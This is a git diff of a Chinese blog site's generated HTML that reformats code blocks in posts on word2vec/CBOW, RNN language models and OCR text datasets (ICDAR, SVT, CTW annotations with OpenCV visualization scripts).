            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            29
            30
            31
            32
            33
            34
            35
            36
            37
            38
            39
            40
            41
            42
            43
            44
            45
            46
            47
            48
            import sys
            sys.path.append('..')
            import numpy as np
            from common import config
            # 在用 GPU 运行时,请打开下面的注释(需要 cupy)
            # ===============================================
            config.GPU = True
            # ===============================================
            import pickle
            from common.trainer import Trainer
            from common.optimizer import Adam
            from common.util import create_contexts_target, to_cpu, to_gpu
            from dataset import ptb

            # 设定超参数
            window_size = 5
            hidden_size = 100
            batch_size = 100
            max_epoch = 10

            # 读入数据
            corpus, word_to_id, id_to_word = ptb.load_data('train')
            vocab_size = len(word_to_id)

            contexts, target = create_contexts_target(corpus, window_size)
            if config.GPU:
            contexts, target = to_gpu(contexts), to_gpu(target)

            # 生成模型等
            model = CBOW(vocab_size, hidden_size, window_size, corpus)
            optimizer = Adam()
            trainer = Trainer(model, optimizer)

            # 开始学习
            trainer.fit(contexts, target, max_epoch, batch_size)
            trainer.plot()

            # 保存必要数据,以便后续使用
            word_vecs = model.word_vecs
            if config.GPU:
            word_vecs = to_cpu(word_vecs)
            params = {}
            params['word_vecs'] = word_vecs.astype(np.float16)
            params['word_to_id'] = word_to_id
            params['id_to_word'] = id_to_word
            pkl_file = 'cbow_params.pkl'
            with open(pkl_file, 'wb') as f:
            pickle.dump(params, f, -1)

            4.3.3 CBOW 模型的评价

            -
            import sys
            sys.path.append('..')
            from common.util import most_similar
            import pickle

            pkl_file = 'cbow_params.pkl'
            with open(pkl_file, 'rb') as f:
            params = pickle.load(f)
            word_vecs = params['word_vecs']
            word_to_id = params['word_to_id']
            id_to_word = params['id_to_word']

            querys = ['you', 'year', 'car', 'toyota']
            for query in querys:
            most_similar(query, word_to_id, id_to_word, word_vecs, top=5)
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            import sys
            sys.path.append('..')
            from common.util import most_similar
            import pickle

            pkl_file = 'cbow_params.pkl'
            with open(pkl_file, 'rb') as f:
            params = pickle.load(f)
            word_vecs = params['word_vecs']
            word_to_id = params['word_to_id']
            id_to_word = params['id_to_word']

            querys = ['you', 'year', 'car', 'toyota']
            for query in querys:
            most_similar(query, word_to_id, id_to_word, word_vecs, top=5)

            4.4 word2vec 相关的其他话题

            4.4.1 word2vec 的应用例

            在自然语言处理领域,单词的分布式表示之所以重要,原因就在于迁移学习(transfer learning)。迁移学习是指在某个领域学到的知识可以被应用于其他领域。

            @@ -4487,6 +4485,8 @@

            目录

            var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-5-RNN/index.html" "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-5-RNN/index.html" index e41cabe005..4a31953a7f 100644 --- "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-5-RNN/index.html" +++ "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-5-RNN/index.html" @@ -44,8 +44,6 @@ - - @@ -449,10 +447,10 @@

            png

            $$h_t=\tanh(h_{t-1}W_h+x_tW_x+b)$$

            -
            class RNN:
            def __init__(self, Wx, Wh, b):
            self.params = [Wx, Wh, b]
            self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]
            self.cache = None


            def forward(self, x, h_prev):
            """
            x: 从下方输入的数据
            h_prev: 从左边输入的数据
            """
            Wx, Wh, b = self.params
            t = np.dot(h_prev, Wh) + np.dot(x, Wx) + b
            h_next = np.tanh(t)
            self.cache = (x, h_prev, h_next)
            return h_next # 当前时刻的 RNN 层的输出(= 下一时刻的 RNN 层的输入)是 h_next


            def backward(self, dh_next):
            Wx, Wh, b = self.params
            x, h_prev, h_next = self.cache

            dt = dh_next * (1 - h_next ** 2)
            db = np.sum(dt, axis=0)
            dWh = np.dot(h_prev.T, dt)
            dh_prev = np.dot(dt, Wh.T)
            dWx = np.dot(x.T, dt)
            dx = np.dot(dt, Wx.T)

            self.grads[0][...] = dWx
            self.grads[1][...] = dWh
            self.grads[2][...] = db
            return dx, dh_prev
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            29
            30
            31
            32
            33
            34
            class RNN:
            def __init__(self, Wx, Wh, b):
            self.params = [Wx, Wh, b]
            self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]
            self.cache = None


            def forward(self, x, h_prev):
            """
            x: 从下方输入的数据
            h_prev: 从左边输入的数据
            """
            Wx, Wh, b = self.params
            t = np.dot(h_prev, Wh) + np.dot(x, Wx) + b
            h_next = np.tanh(t)
            self.cache = (x, h_prev, h_next)
            return h_next # 当前时刻的 RNN 层的输出(= 下一时刻的 RNN 层的输入)是 h_next


            def backward(self, dh_next):
            Wx, Wh, b = self.params
            x, h_prev, h_next = self.cache

            dt = dh_next * (1 - h_next ** 2)
            db = np.sum(dt, axis=0)
            dWh = np.dot(h_prev.T, dt)
            dh_prev = np.dot(dt, Wh.T)
            dWx = np.dot(x.T, dt)
            dx = np.dot(dt, Wx.T)

            self.grads[0][...] = dWx
            self.grads[1][...] = dWh
            self.grads[2][...] = db
            return dx, dh_prev

            5.3.2 Time RNN 层的实现

            Time RNN 层是 T 个 RNN 层连接起来的网络。我们将这个网络实现为 Time RNN 层。这里,RNN 层的隐藏状态 h 保存在成员变量中。

            -
            class TimeRNN:
            def __init__(self, Wx, Wh, b, stateful=False):
            """
            layers: 在列表中保存多个 RNN 层
            h: 保存调用 forward() 方法时的最后一个 RNN 层的隐藏状态
            """
            self.params = [Wx, Wh, b]
            self.grads = [np.zeros_like(Wx), np.zeros_like(Wh),
            np.zeros_like(b)]
            self.layers = None
            self.h, self.dh = None, None
            self.stateful = stateful


            def set_state(self, h):
            self.h = h


            def reset_state(self):
            self.h = None


            def forward(self, xs):
            Wx, Wh, b = self.params
            N, T, D = xs.shape
            D, H = Wx.shape

            self.layers = []
            hs = np.empty((N, T, H), dtype='f')

            if not self.stateful or self.h is None:
            self.h = np.zeros((N, H), dtype='f')

            for t in range(T):
            layer = RNN(*self.params)
            self.h = layer.forward(xs[:, t, :], self.h)
            hs[:, t, :] = self.h
            self.layers.append(layer)
            return hs


            def backward(self, dhs):
            Wx, Wh, b = self.params
            N, T, H = dhs.shape
            D, H = Wx.shape

            dxs = np.empty((N, T, D), dtype='f')
            dh = 0
            grads = [0, 0, 0]
            for t in reversed(range(T)):
            layer = self.layers[t]
            dx, dh = layer.backward(dhs[:, t, :] + dh) # 求和后的梯度
            dxs[:, t, :] = dx

            for i, grad in enumerate(layer.grads):
            grads[i] += grad

            for i, grad in enumerate(grads):
            self.grads[i][...] = grad
            self.dh = dh

            return dxs
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            29
            30
            31
            32
            33
            34
            35
            36
            37
            38
            39
            40
            41
            42
            43
            44
            45
            46
            47
            48
            49
            50
            51
            52
            53
            54
            55
            56
            57
            58
            59
            60
            61
            62
            class TimeRNN:
            def __init__(self, Wx, Wh, b, stateful=False):
            """
            layers: 在列表中保存多个 RNN 层
            h: 保存调用 forward() 方法时的最后一个 RNN 层的隐藏状态
            """
            self.params = [Wx, Wh, b]
            self.grads = [np.zeros_like(Wx), np.zeros_like(Wh),
            np.zeros_like(b)]
            self.layers = None
            self.h, self.dh = None, None
            self.stateful = stateful


            def set_state(self, h):
            self.h = h


            def reset_state(self):
            self.h = None


            def forward(self, xs):
            Wx, Wh, b = self.params
            N, T, D = xs.shape
            D, H = Wx.shape

            self.layers = []
            hs = np.empty((N, T, H), dtype='f')

            if not self.stateful or self.h is None:
            self.h = np.zeros((N, H), dtype='f')

            for t in range(T):
            layer = RNN(*self.params)
            self.h = layer.forward(xs[:, t, :], self.h)
            hs[:, t, :] = self.h
            self.layers.append(layer)
            return hs


            def backward(self, dhs):
            Wx, Wh, b = self.params
            N, T, H = dhs.shape
            D, H = Wx.shape

            dxs = np.empty((N, T, D), dtype='f')
            dh = 0
            grads = [0, 0, 0]
            for t in reversed(range(T)):
            layer = self.layers[t]
            dx, dh = layer.backward(dhs[:, t, :] + dh) # 求和后的梯度
            dxs[:, t, :] = dx

            for i, grad in enumerate(layer.grads):
            grads[i] += grad

            for i, grad in enumerate(grads):
            self.grads[i][...] = grad
            self.dh = dh

            return dxs

            5.4 处理时序数据的层的实现

            我们将基于 RNN 的语言模型称为 RNNLM(RNN Language Model,RNN 语言模型)

            5.4.1 RNNLM 的全貌图

            @@ -461,7 +459,7 @@

            5.5 RNNLM 的学习和评价

            5.5.1 RNNLM 的实现

            -
            import sys
            sys.path.append('..')
            import numpy as np
            from common.time_layers import *


            class SimpleRnnlm:
            def __init__(self, vocab_size, wordvec_size, hidden_size):
            V, D, H = vocab_size, wordvec_size, hidden_size
            rn = np.random.randn
            # 初始化权重
            embed_W = (rn(V, D) / 100).astype('f')
            rnn_Wx = (rn(D, H) / np.sqrt(D)).astype('f')
            rnn_Wh = (rn(H, H) / np.sqrt(H)).astype('f')
            rnn_b = np.zeros(H).astype('f')
            affine_W = (rn(H, V) / np.sqrt(H)).astype('f')
            affine_b = np.zeros(V).astype('f')

            # 生成层
            self.layers = [
            TimeEmbedding(embed_W),
            TimeRNN(rnn_Wx, rnn_Wh, rnn_b, stateful=True),
            TimeAffine(affine_W, affine_b)
            ]
            self.loss_layer = TimeSoftmaxWithLoss()
            self.rnn_layer = self.layers[1]

            # 将所有的权重和梯度整理到列表中
            self.params, self.grads = [], []
            for layer in self.layers:
            self.params += layer.params
            self.grads += layer.grads


            def forward(self, xs, ts):
            for layer in self.layers:
            xs = layer.forward(xs)
            loss = self.loss_layer.forward(xs, ts)
            return loss


            def backward(self, dout=1):
            dout = self.loss_layer.backward(dout)
            for layer in reversed(self.layers):
            dout = layer.backward(dout)
            return dout


            def reset_state(self):
            self.rnn_layer.reset_state()
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            29
            30
            31
            32
            33
            34
            35
            36
            37
            38
            39
            40
            41
            42
            43
            44
            45
            46
            47
            48
            49
            50
            import sys
            sys.path.append('..')
            import numpy as np
            from common.time_layers import *


            class SimpleRnnlm:
            def __init__(self, vocab_size, wordvec_size, hidden_size):
            V, D, H = vocab_size, wordvec_size, hidden_size
            rn = np.random.randn
            # 初始化权重
            embed_W = (rn(V, D) / 100).astype('f')
            rnn_Wx = (rn(D, H) / np.sqrt(D)).astype('f')
            rnn_Wh = (rn(H, H) / np.sqrt(H)).astype('f')
            rnn_b = np.zeros(H).astype('f')
            affine_W = (rn(H, V) / np.sqrt(H)).astype('f')
            affine_b = np.zeros(V).astype('f')

            # 生成层
            self.layers = [
            TimeEmbedding(embed_W),
            TimeRNN(rnn_Wx, rnn_Wh, rnn_b, stateful=True),
            TimeAffine(affine_W, affine_b)
            ]
            self.loss_layer = TimeSoftmaxWithLoss()
            self.rnn_layer = self.layers[1]

            # 将所有的权重和梯度整理到列表中
            self.params, self.grads = [], []
            for layer in self.layers:
            self.params += layer.params
            self.grads += layer.grads


            def forward(self, xs, ts):
            for layer in self.layers:
            xs = layer.forward(xs)
            loss = self.loss_layer.forward(xs, ts)
            return loss


            def backward(self, dout=1):
            dout = self.loss_layer.backward(dout)
            for layer in reversed(self.layers):
            dout = layer.backward(dout)
            return dout


            def reset_state(self):
            self.rnn_layer.reset_state()

            5.5.2 语言模型的评价

            **困惑度(perplexity)**常被用作评价语言模型的预测性能的指标。困惑度表示“概率的倒数”(这个解释在数据量为 1 时严格一
            致)。

            @@ -476,7 +474,7 @@

            下面,我们使用 PTB 数据集进行学习,不过这里仅使用 PTB 数据集(训练数据)的前 1000 个单词。这是因为在本节实现的 RNNLM 中,即便使用所有的训练数据,也得不出好的结果。

        -
        import sys
        sys.path.append('..')
        import matplotlib.pyplot as plt
        import numpy as np
        from common.optimizer import SGD
        from dataset import ptb


        # 设定超参数
        batch_size = 10
        wordvec_size = 100
        hidden_size = 100
        time_size = 5 # Truncated BPTT 的时间跨度大小
        lr = 0.1
        max_epoch = 100

        # 读入训练数据(缩小了数据集)
        corpus, word_to_id, id_to_word = ptb.load_data('train')
        corpus_size = 1000
        corpus = corpus[:corpus_size]
        vocab_size = int(max(corpus) + 1)

        xs = corpus[:-1] # 输入
        ts = corpus[1:] # 输出(监督标签)
        data_size = len(xs)
        print('corpus size: %d, vocabulary size: %d' % (corpus_size, vocab_size))

        # 学习用的参数
        max_iters = data_size // (batch_size * time_size)
        time_idx = 0
        total_loss = 0
        loss_count = 0
        ppl_list = []

        # 生成模型
        model = SimpleRnnlm(vocab_size, wordvec_size, hidden_size)
        optimizer = SGD(lr)

        # 计算读入 mini-batch 的各笔样本数据的开始位置
        jump = (corpus_size - 1) // batch_size
        offsets = [i * jump for i in range(batch_size)]

        for epoch in range(max_epoch):
        for iter in range(max_iters):
        # 获取 mini-batch
        batch_x = np.empty((batch_size, time_size), dtype='i')
        batch_t = np.empty((batch_size, time_size), dtype='i')
        for t in range(time_size):
        for i, offset in enumerate(offsets):
        batch_x[i, t] = xs[(offset + time_idx) % data_size]
        batch_t[i, t] = ts[(offset + time_idx) % data_size]
        time_idx += 1

        # 计算梯度,更新参数
        loss = model.forward(batch_x, batch_t)
        model.backward()
        optimizer.update(model.params, model.grads)
        total_loss += loss
        loss_count += 1

        # 各个 epoch 的困惑度评价
        ppl = np.exp(total_loss / loss_count)
        print('| epoch %d | perplexity %.2f'
        % (epoch+1, ppl))
        ppl_list.append(float(ppl))
        total_loss, loss_count = 0, 0

        # 绘制图形
        x = np.arange(len(ppl_list))
        plt.plot(x, ppl_list, label='train')
        plt.xlabel('epochs')
        plt.ylabel('perplexity')
        plt.show()
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        58
        59
        60
        61
        62
        63
        64
        65
        66
        67
        68
        69
        70
        71
        72
        73
        import sys
        sys.path.append('..')
        import matplotlib.pyplot as plt
        import numpy as np
        from common.optimizer import SGD
        from dataset import ptb


        # 设定超参数
        batch_size = 10
        wordvec_size = 100
        hidden_size = 100
        time_size = 5 # Truncated BPTT 的时间跨度大小
        lr = 0.1
        max_epoch = 100

        # 读入训练数据(缩小了数据集)
        corpus, word_to_id, id_to_word = ptb.load_data('train')
        corpus_size = 1000
        corpus = corpus[:corpus_size]
        vocab_size = int(max(corpus) + 1)

        xs = corpus[:-1] # 输入
        ts = corpus[1:] # 输出(监督标签)
        data_size = len(xs)
        print('corpus size: %d, vocabulary size: %d' % (corpus_size, vocab_size))

        # 学习用的参数
        max_iters = data_size // (batch_size * time_size)
        time_idx = 0
        total_loss = 0
        loss_count = 0
        ppl_list = []

        # 生成模型
        model = SimpleRnnlm(vocab_size, wordvec_size, hidden_size)
        optimizer = SGD(lr)

        # 计算读入 mini-batch 的各笔样本数据的开始位置
        jump = (corpus_size - 1) // batch_size
        offsets = [i * jump for i in range(batch_size)]

        for epoch in range(max_epoch):
        for iter in range(max_iters):
        # 获取 mini-batch
        batch_x = np.empty((batch_size, time_size), dtype='i')
        batch_t = np.empty((batch_size, time_size), dtype='i')
        for t in range(time_size):
        for i, offset in enumerate(offsets):
        batch_x[i, t] = xs[(offset + time_idx) % data_size]
        batch_t[i, t] = ts[(offset + time_idx) % data_size]
        time_idx += 1

        # 计算梯度,更新参数
        loss = model.forward(batch_x, batch_t)
        model.backward()
        optimizer.update(model.params, model.grads)
        total_loss += loss
        loss_count += 1

        # 各个 epoch 的困惑度评价
        ppl = np.exp(total_loss / loss_count)
        print('| epoch %d | perplexity %.2f'
        % (epoch+1, ppl))
        ppl_list.append(float(ppl))
        total_loss, loss_count = 0, 0

        # 绘制图形
        x = np.arange(len(ppl_list))
        plt.plot(x, ppl_list, label='train')
        plt.xlabel('epochs')
        plt.ylabel('perplexity')
        plt.show()
        corpus size: 1000, vocabulary size: 418
         | epoch 1 | perplexity 381.82
         | epoch 2 | perplexity 249.18
        @@ -4531,6 +4529,8 @@ 

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Dataset-\346\224\266\351\233\206\344\270\200\344\270\213\346\226\207\346\234\254\347\232\204\345\220\204\347\247\215\346\225\260\346\215\256\351\233\206/index.html" "b/posts/Dataset-\346\224\266\351\233\206\344\270\200\344\270\213\346\226\207\346\234\254\347\232\204\345\220\204\347\247\215\346\225\260\346\215\256\351\233\206/index.html" index a9cbf5ae21..4efced0bba 100644 --- "a/posts/Dataset-\346\224\266\351\233\206\344\270\200\344\270\213\346\226\207\346\234\254\347\232\204\345\220\204\347\247\215\346\225\260\346\215\256\351\233\206/index.html" +++ "b/posts/Dataset-\346\224\266\351\233\206\344\270\200\344\270\213\346\226\207\346\234\254\347\232\204\345\220\204\347\247\215\346\225\260\346\215\256\351\233\206/index.html" @@ -44,8 +44,6 @@ - - @@ -455,7 +453,7 @@

        0000172.jpg
        -
        {"annotations": [[
        {
        "adjusted_bbox": [140.26028096262758, 897.1957001682758, 22.167573140645146, 38.36424196832945],
        "attributes": ["distorted", "raised"],
        "is_chinese": true,
        "polygon": [[140.26028096262758, 896.7550603352049], [162.42785410327272, 898.0769798344178], [162.42785410327272, 935.7929346470926], [140.26028096262758, 935.0939571156308]],
        "text": "\u660e"
        },
        {
        "adjusted_bbox": [162.42785410327272, 898.5416545674744, 23.376713493771263, 37.74268246537315],
        "attributes": ["distorted", "raised"],
        "is_chinese": true,
        "polygon": [[162.42785410327272, 898.0769798344178], [185.80456759704398, 899.4710040335876], [185.80456759704398, 936.5300382257251], [162.42785410327272, 935.7929346470926]],
        "text": "\u6d77"
        },
        ……
        "image_id": "0000172", "width": 2048}
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        {"annotations": [[
        {
        "adjusted_bbox": [140.26028096262758, 897.1957001682758, 22.167573140645146, 38.36424196832945],
        "attributes": ["distorted", "raised"],
        "is_chinese": true,
        "polygon": [[140.26028096262758, 896.7550603352049], [162.42785410327272, 898.0769798344178], [162.42785410327272, 935.7929346470926], [140.26028096262758, 935.0939571156308]],
        "text": "\u660e"
        },
        {
        "adjusted_bbox": [162.42785410327272, 898.5416545674744, 23.376713493771263, 37.74268246537315],
        "attributes": ["distorted", "raised"],
        "is_chinese": true,
        "polygon": [[162.42785410327272, 898.0769798344178], [185.80456759704398, 899.4710040335876], [185.80456759704398, 936.5300382257251], [162.42785410327272, 935.7929346470926]],
        "text": "\u6d77"
        },
        ……
        "image_id": "0000172", "width": 2048}

        ​ 对应的注释,每个字都有:

        • @@ -502,7 +500,7 @@

          17_18.jpg

          ​ 对应的 Ground Truth,一个单词一个文本框,还包含了地址、环境等信息:

          -
          <image>
          <imageName>img/17_18.jpg</imagesName>
          <address>420 South 1st Street San Jose CA 95112</address>
          <lex>SOUTH,FIRST,BILLIARDS,CLUB,AND,LOUNGE,AGENDA,RESTAURANT,BAR,RAMADA,LIMITED,SAN,JOSE,WET,NIGHTCLUB,MOTIF,ANNO,DOMINI,EULIPIA,DOWNTOWN,YOGA,SHALA,WHIPSAW,INC,ZOE,SAINTE,CLAIRE,HOTEL,SCORES,SPORTS,GRILL,WORKS,SPY,MUSEUM,QUILTS,TEXTILES,MIAMI,BEACH,STAGE,COMPANY,CACTUS,ANGELS,DAI,THANH,SUPERMARKET</lex>
          <Resolution x="1024" y="768"/>
          <taggedRectangles>
          <taggedRectangle height="41" width="152" x="480" y="403">
          <tag>BILLIARDS</tag>
          </taggedRectangle>
          <taggedRectangle height="33" width="78" x="407" y="410">
          <tag>FIRST</tag>
          </taggedRectangle>
          <taggedRectangle height="30" width="85" x="322" y="416">
          <tag>SOUTH</tag>
          </taggedRectangle>
          </taggedRectangles>
          </images>
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          17
          <image>
          <imageName>img/17_18.jpg</imagesName>
          <address>420 South 1st Street San Jose CA 95112</address>
          <lex>SOUTH,FIRST,BILLIARDS,CLUB,AND,LOUNGE,AGENDA,RESTAURANT,BAR,RAMADA,LIMITED,SAN,JOSE,WET,NIGHTCLUB,MOTIF,ANNO,DOMINI,EULIPIA,DOWNTOWN,YOGA,SHALA,WHIPSAW,INC,ZOE,SAINTE,CLAIRE,HOTEL,SCORES,SPORTS,GRILL,WORKS,SPY,MUSEUM,QUILTS,TEXTILES,MIAMI,BEACH,STAGE,COMPANY,CACTUS,ANGELS,DAI,THANH,SUPERMARKET</lex>
          <Resolution x="1024" y="768"/>
          <taggedRectangles>
          <taggedRectangle height="41" width="152" x="480" y="403">
          <tag>BILLIARDS</tag>
          </taggedRectangle>
          <taggedRectangle height="33" width="78" x="407" y="410">
          <tag>FIRST</tag>
          </taggedRectangle>
          <taggedRectangle height="30" width="85" x="322" y="416">
          <tag>SOUTH</tag>
          </taggedRectangle>
          </taggedRectangles>
          </images>

          ICDAR

          ​ 资源:

            @@ -518,9 +516,9 @@

            img_1.jpg

            ​ 对应的 Ground Truth gt_img_1.txt

            -
            38, 43, 920, 215, "Tiredness"
            275, 264, 665, 450, "kills"
            0, 699, 77, 830, "A"
            128, 705, 483, 839, "short"
            542, 710, 938, 841, "break"
            87, 884, 457, 1021, "could"
            517, 919, 831, 1024, "save"
            166, 1095, 468, 1231, "your"
            530, 1069, 743, 1206, "life"
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            38, 43, 920, 215, "Tiredness"
            275, 264, 665, 450, "kills"
            0, 699, 77, 830, "A"
            128, 705, 483, 839, "short"
            542, 710, 938, 841, "break"
            87, 884, 457, 1021, "could"
            517, 919, 831, 1024, "save"
            166, 1095, 468, 1231, "your"
            530, 1069, 743, 1206, "life"

            ​ 数据集可视化代码:

            -
            import cv2
            import os
            import matplotlib.pyplot as plt
            import numpy as np

            index = 1

            image_dir = r'XXX/ICDAR 2013/Challenge2_Test_Task12_Images/'
            label_dir = r'XXX/ICDAR 2013/Challenge2_Test_Task1_GT/'

            image_path = os.path.join(image_dir, 'img_' + str(index) + '.jpg')
            label_path = os.path.join(label_dir, 'gt_img_' + str(index) + '.txt')

            image_origin = cv2.imread(image_path)
            image = image_origin.copy()
            height, width, _ = image.shape
            label_file = open(label_path, 'r')
            annotations = label_file.readlines()
            label_file.close()

            for annotation in annotations:
            coords = list(map(int, annotation.split(',')[:-1]))
            transcriptions = annotation.split(',')[-1][2:-2]
            points = np.array([(coords[i], coords[i+1]) for i in range(0, len(coords), 2)])
            cv2.rectangle(image, (points[0][0], points[0][1]), (points[1][0], points[1][1]), (255, 0, 0), 2)
            for p in points:
            cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
            cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
            min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

            fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
            axes = axes.flatten()

            axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
            axes[0].axis('off')
            axes[0].set_title('Origin')

            axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
            axes[1].axis('off')
            axes[1].set_title('Annotation')

            plt.tight_layout()
            plt.show()
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            29
            30
            31
            32
            33
            34
            35
            36
            37
            38
            39
            40
            41
            42
            43
            import cv2
            import os
            import matplotlib.pyplot as plt
            import numpy as np

            index = 1

            image_dir = r'XXX/ICDAR 2013/Challenge2_Test_Task12_Images/'
            label_dir = r'XXX/ICDAR 2013/Challenge2_Test_Task1_GT/'

            image_path = os.path.join(image_dir, 'img_' + str(index) + '.jpg')
            label_path = os.path.join(label_dir, 'gt_img_' + str(index) + '.txt')

            image_origin = cv2.imread(image_path)
            image = image_origin.copy()
            height, width, _ = image.shape
            label_file = open(label_path, 'r')
            annotations = label_file.readlines()
            label_file.close()

            for annotation in annotations:
            coords = list(map(int, annotation.split(',')[:-1]))
            transcriptions = annotation.split(',')[-1][2:-2]
            points = np.array([(coords[i], coords[i+1]) for i in range(0, len(coords), 2)])
            cv2.rectangle(image, (points[0][0], points[0][1]), (points[1][0], points[1][1]), (255, 0, 0), 2)
            for p in points:
            cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
            cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
            min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

            fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
            axes = axes.flatten()

            axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
            axes[0].axis('off')
            axes[0].set_title('Origin')

            axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
            axes[1].axis('off')
            axes[1].set_title('Annotation')

            plt.tight_layout()
            plt.show()

            webp

            Task 2.2: Text Segmentation (2013 edition)

            ​ 数据集和 2.1 一样,只不过 Ground Truth 是 segmentation masks gt_img_1.png

            @@ -536,7 +534,7 @@

            word_1.png

            ​ 对应的 Ground Truth gt.txt 里的一行:

            -
            word_1.png, "PROPER"
            +
            1
            word_1.png, "PROPER"
            Task 2.4: End to End (2015 edition)

            想让网络识别单词,并且提供了单词库?

            @@ -559,11 +557,11 @@

            img_2.jpg

            ​ 对应的 Ground Truth gt_img_2.txt

            -
            790,302,903,304,902,335,790,335,JOINT
            822,288,872,286,871,298,823,300,yourself
            641,138,657,139,657,151,641,151,###
            669,139,693,140,693,154,669,153,154
            700,141,723,142,723,155,701,154,197
            637,101,721,106,722,115,637,110,###
            668,157,693,158,693,170,668,170,727
            636,155,661,156,662,169,636,168,198
            660,82,700,85,700,99,660,96,20029
            925,252,973,254,973,262,925,262,###
            789,284,818,284,818,297,789,297,Free
            875,286,902,289,903,298,875,298,from
            791,337,863,337,863,364,791,364,PAIN
            794,445,818,445,818,473,794,473,###
            922,440,962,442,963,462,922,463,###
            924,476,967,476,968,489,924,491,###
            924,505,962,506,965,518,923,519,###
            847,524,887,524,887,555,847,555,###
            791,474,822,474,822,500,791,500,###
            780,582,910,576,909,583,780,588,###
            854,456,902,455,902,465,854,467,###
            854,467,903,467,903,480,854,480,###
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            790,302,903,304,902,335,790,335,JOINT
            822,288,872,286,871,298,823,300,yourself
            641,138,657,139,657,151,641,151,###
            669,139,693,140,693,154,669,153,154
            700,141,723,142,723,155,701,154,197
            637,101,721,106,722,115,637,110,###
            668,157,693,158,693,170,668,170,727
            636,155,661,156,662,169,636,168,198
            660,82,700,85,700,99,660,96,20029
            925,252,973,254,973,262,925,262,###
            789,284,818,284,818,297,789,297,Free
            875,286,902,289,903,298,875,298,from
            791,337,863,337,863,364,791,364,PAIN
            794,445,818,445,818,473,794,473,###
            922,440,962,442,963,462,922,463,###
            924,476,967,476,968,489,924,491,###
            924,505,962,506,965,518,923,519,###
            847,524,887,524,887,555,847,555,###
            791,474,822,474,822,500,791,500,###
            780,582,910,576,909,583,780,588,###
            854,456,902,455,902,465,854,467,###
            854,467,903,467,903,480,854,480,###

            ​ 数据集可视化代码:

            -
            import cv2
            import os
            import matplotlib.pyplot as plt
            import numpy as np

            index = 463

            image_dir = r'XXX/ICDAR_2015/test_img/'
            label_dir = r'XXX/ICDAR_2015/test_gt/'

            image_path = os.path.join(image_dir, 'img_' + str(index) + '.jpg')
            label_path = os.path.join(label_dir, 'gt_img_' + str(index) + '.txt')

            image_origin = cv2.imread(image_path)
            image = image_origin.copy()
            height, width, _ = image.shape
            label_file = open(label_path, 'r')
            annotations = label_file.readlines()
            label_file.close()

            for annotation in annotations:
            coords = list(map(int, annotation.split(',')[:-1]))
            transcriptions = annotation.split(',')[-1]
            points = np.array([(coords[i], coords[i+1]) for i in range(0, len(coords), 2)])
            cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
            for p in points:
            cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

            cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
            min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

            fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
            axes = axes.flatten()

            axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
            axes[0].axis('off')
